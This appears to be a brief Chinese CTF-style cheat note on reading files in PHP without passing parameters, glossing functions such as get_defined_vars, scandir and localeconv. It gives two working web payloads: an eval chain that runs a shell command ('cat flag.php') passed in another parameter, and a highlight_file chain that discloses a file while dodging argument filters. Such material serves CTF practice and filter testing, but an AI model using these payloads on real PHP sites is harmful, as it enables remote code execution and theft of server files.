无参数文件读取

1
2
3
4
get_defined_vars() 返回一个包含所有已定义变量列表的多维数组,这些变量包括环境变量、服务器变量和用户定义的变量。
 array_pop() 是删除并返回数组最后一个元素
 current() 返回数组中的当前元素的值。
 next() 返回数组中的下一个元素的值。
1
2
3
?c=eval(array_pop((next((get_defined_vars())))));

cmd=system(cat flag.php);

2

1
2
3
4
5
scandir() 函数返回指定目录中的文件和目录的数组。
print_r() 函数用于打印变量,以更容易理解的形式展示。
localeconv()函数会返回一一个包含本地数字及货币格式信息的数组,该数组的第一个元素就是"."
current() 函数返回数组中的当前元素的值。别名是 pos()
array_reverse() 函数将原数组中的元素顺序翻转,创建新的数组并返回。

?c=highlight_file(next(array_reverse(scandir((pos(localeconv()))))));